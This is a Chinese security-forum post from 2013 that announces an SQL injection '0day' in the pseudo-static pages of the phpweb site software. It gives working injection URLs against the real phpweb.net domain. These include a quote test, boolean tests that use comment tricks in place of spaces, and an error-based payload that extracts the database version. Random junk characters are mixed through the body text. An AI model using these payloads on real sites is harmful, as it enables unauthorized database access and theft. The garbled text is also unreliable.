找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2410|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入; h5 |" a  M2 o
; y3 r( g. A% H" Q5 J; L
主站:http://phpweb.net/# d% u: y" x  a3 z) e5 z: g6 |
加’检测:
( Z& x& b5 Y1 N  ?5 E: c& V
) m- P7 X! |$ jhttp://www.phpweb.net/down/html/?772′.html1 p; F  L+ \7 Y+ k: B9 S
/ W6 {6 p: X4 d, q! k' q
出错6 i- ^* K$ P+ ]! g2 a8 O$ W. S9 R
存在注入。! o& T- s' }1 ~6 c4 ^4 |7 ~- K
不能用空格,只能用/*罗
1 o% N6 O% Q3 A5 P) U& V& Shttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
6 o, w7 l8 l" e
7 C$ n" [* m/ z7 ~$ q1 ~- n- {http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.# _1 H& ~1 q1 u* \+ |- U& [# Q
爆数据库版本:
" P: M1 ^  |* \* ~/ Z " r3 X4 ~4 {" q' B
?
7 V/ M  s# k5 ]  D8 B. A2 H! C9 x$ V. t1  p* Z, X+ M8 r1 ^; E2 G" @1 O
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
0 _8 E1 A) j* C+ r" d更新日期: 2013-01-03 13:39:50        
: ^+ U: o5 k+ L( F: V+ @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表